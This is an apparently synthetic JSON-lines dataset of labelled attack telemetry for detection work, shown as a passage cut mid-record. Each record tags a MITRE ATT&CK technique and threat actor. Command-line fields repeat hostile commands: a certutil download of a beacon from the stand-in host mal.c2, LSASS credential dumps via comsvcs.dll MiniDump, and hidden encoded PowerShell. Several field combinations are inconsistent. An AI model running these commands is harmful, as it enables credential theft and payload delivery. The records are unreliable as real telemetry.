Logs","timestamp":"2026-08-14T11:45:38.000Z","user":{"name":"arn:aws:iam::pmz4bz9bexpq","sid":"S-1-5-21-841066571-840303453-7052"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Impact","Command and Control","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_lapsus_20261218T184113000Z_0016943","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.117.183.50","name":"APP-WEB-HVZW15ZDPB","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16943Lapsus$T1570"},"network":{"domain":"github.com","dst_ip":"1.21.60.61","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-01T12:57:02.000Z","user":{"name":"svc_7aicad3oefoq","sid":"S-1-5-21-406661757-574664381-8581"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20251225T202841000Z_0016945","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.85.131.59","name":"AZURE-VM-BTASG8XOOY","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16945APT29T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.62.87.151","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-12T17:40:32.000Z","user":{"name":"CORP\\57831oo7nerj","sid":"S-1-5-21-276018747-817727823-1148"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Command and Control","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250403T171202000Z_0016947","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.99.51.70","name":"IAM-ROLE-XMHVT11GMV","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16947Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.0.82.104","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-11T02:01:52.000Z","user":{"name":"CORP\\p9a1vxpj7yaf","sid":"S-1-5-21-367556462-705314388-6499"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Credential Access","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250326T045845000Z_0016949","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.97.225.211","name":"APP-WEB-OP5QV1CFBD","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16949Mustang PandaT1566.001"},"network":{"domain":"github.com","dst_ip":"1.148.121.137","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2630 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-30T00:45:24.000Z","user":{"name":"azuread\\mzrkk65e25cr","sid":"S-1-5-21-337908508-734102239-7220"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260501T181204000Z_0016951","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.67.74.240","name":"WIN-FIN-SRV-TDGC2GVVXK","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16951UNC4841T1098.004"},"network":{"domain":"github.com","dst_ip":"1.182.75.247","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-18T04:33:11.000Z","user":{"name":"CORP\\lnt3lab4et8x","sid":"S-1-5-21-496193416-761279746-3761"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20250313T185815000Z_0016953","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.102.75.250","name":"APP-WEB-5C4U02HBBP","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16953Mustang PandaT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.132.201.215","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2487 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-07T15:13:49.000Z","user":{"name":"arn:aws:iam::zn1wkuz4yoir","sid":"S-1-5-21-155462235-671338898-8108"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250831T064614000Z_0016955","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.59.219.66","name":"IAM-ROLE-3CQAERSL8X","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16955APT41T1484.001"},"network":{"domain":"github.com","dst_ip":"1.186.229.214","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 511 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-10-12T14:07:59.000Z","user":{"name":"azuread\\rjq4prkcst4g","sid":"S-1-5-21-829079370-975138633-8799"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Discovery","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260602T041452000Z_0016957","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.196.202.243","name":"EC2-INST-PZIYUA7491","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16957Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.44.89.195","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-07T13:10:20.000Z","user":{"name":"i-nvoeuq6x333x","sid":"S-1-5-21-938655363-596380494-8809"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt29_20260908T124955000Z_0016959","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.73.140.171","name":"WIN-FIN-SRV-9E78VP98XK","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16959APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.72.131.74","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-03-10T19:58:34.000Z","user":{"name":"svc_iyg8gfcqy6tu","sid":"S-1-5-21-484310348-479483163-6422"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20260310T083023000Z_0016961","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.228.71.28","name":"APP-WEB-FUMG3TEUTT","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16961UNC4841T1003.001"},"network":{"domain":"github.com","dst_ip":"1.81.151.209","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-11-29T03:30:14.000Z","user":{"name":"arn:aws:iam::kxbo3iv5xym5","sid":"S-1-5-21-186491264-226804573-1349"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution"],"technique_id":"T1570"},"event_id":"evt_apt41_20260405T124610000Z_0016963","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.204.31.127","name":"IAM-ROLE-8AMJCGAOED","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16963APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.152.255.31","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-17T20:53:39.000Z","user":{"name":"azuread\\dwo5rd57dj2i","sid":"S-1-5-21-775229973-338968938-8850"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Privilege Escalation","Discovery"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20250719T052728000Z_0016965","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.117.171.200","name":"AZURE-VM-DN0AYLF90I","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16965Scattered SpiderT1570"},"network":{"domain":"github.com","dst_ip":"1.147.203.64","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1613 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-07T04:58:50.000Z","user":{"name":"svc_un7pmml5g7zq","sid":"S-1-5-21-592036296-825105735-1444"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Privilege Escalation","Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20251012T062953000Z_0016967","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.54.197.138","name":"APP-WEB-6RC6ZX424D","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16967Mustang PandaT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.79.192.11","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-27T18:22:24.000Z","user":{"name":"i-j37weuoxlmak","sid":"S-1-5-21-777337596-221363254-3161"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Credential Access","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_apt29_20260827T205837000Z_0016969","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.37.162.252","name":"IAM-ROLE-4SO72PXKPE","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16969APT29T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.20.234.169","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-09T18:42:22.000Z","user":{"name":"svc_35q2bdd5np4z","sid":"S-1-5-21-417002279-368193572-8868"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Defense Evasion","Command and Control"],"technique_id":"T1531"},"event_id":"evt_apt41_20250803T180835000Z_0016971","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.40.162.132","name":"IAM-ROLE-LXINJDF1KK","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16971APT41T1531"},"network":{"domain":"github.com","dst_ip":"1.141.232.75","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-04T03:18:00.000Z","user":{"name":"svc_g6sa0rbe18u8","sid":"S-1-5-21-569996303-381318939-5867"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Initial Access","Execution","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260816T164459000Z_0016973","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.191.201.159","name":"APP-WEB-9PJSRHK8EX","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16973APT29T1059.001"},"network":{"domain":"github.com","dst_ip":"1.2.193.29","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 794 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-27T14:31:42.000Z","user":{"name":"svc_xsv4z6skyi46","sid":"S-1-5-21-380299095-256081866-2159"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Collection","Impact"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260329T194453000Z_0016975","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.252.9.148","name":"APP-WEB-RMW2J9KXK2","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16975Scattered SpiderT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.45.13.200","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3399 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-22T18:04:32.000Z","user":{"name":"arn:aws:iam::t9cu9mg8jou4","sid":"S-1-5-21-504715216-210856481-5944"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration","Discovery","Impact"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20260510T154922000Z_0016977","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.39.27.149","name":"APP-WEB-YGODLYHJVZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16977UNC4841T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.120.115.85","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3782 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-11-11T20:25:04.000Z","user":{"name":"arn:aws:iam::2zn39b6foxan","sid":"S-1-5-21-373688404-864904407-8855"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260713T014244000Z_0016979","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.106.52.96","name":"WIN-FIN-SRV-KNHTZLOH0X","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16979Lapsus$T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.9.15.2","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-09T08:07:40.000Z","user":{"name":"svc_zlkn441nmxth","sid":"S-1-5-21-244172577-306475443-8123"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access","Reconnaissance","Impact"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20260202T011002000Z_0016981","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.113.19.176","name":"DB-ORACLE-L08OQ6UDSV","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16981APT41T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.125.153.93","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-27T03:07:07.000Z","user":{"name":"CORP\\rugnvsivjw04","sid":"S-1-5-21-543027486-545602958-5917"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence","Reconnaissance","Execution"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20261112T123951000Z_0016983","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.148.144.187","name":"DB-ORACLE-N41QZE4M7K","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16983Volt TyphoonT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.116.73.75","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3237 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-26T23:24:30.000Z","user":{"name":"i-c84xqsbla5yf","sid":"S-1-5-21-599428383-555193743-5428"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Collection","Initial Access","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260221T211055000Z_0016985","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.251.159.6","name":"WIN-FIN-SRV-6O3NRG53QY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16985UNC4841T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.148.33.242","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-05T01:42:20.000Z","user":{"name":"svc_rjytv9aumaaq","sid":"S-1-5-21-622927036-206880443-9023"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Persistence"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20260323T162526000Z_0016987","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.2.52.167","name":"IAM-ROLE-PPSW42YJE6","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16987Mustang PandaT1059.001"},"network":{"domain":"github.com","dst_ip":"1.102.170.227","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1871 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-04T13:01:47.000Z","user":{"name":"CORP\\kvki6kvqd2dx","sid":"S-1-5-21-540946122-802389888-8422"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Impact","Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250625T135015000Z_0016989","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.247.233.177","name":"EC2-INST-RNDYGZBKW9","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16989UNC4841T1059.001"},"network":{"domain":"github.com","dst_ip":"1.127.6.223","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc 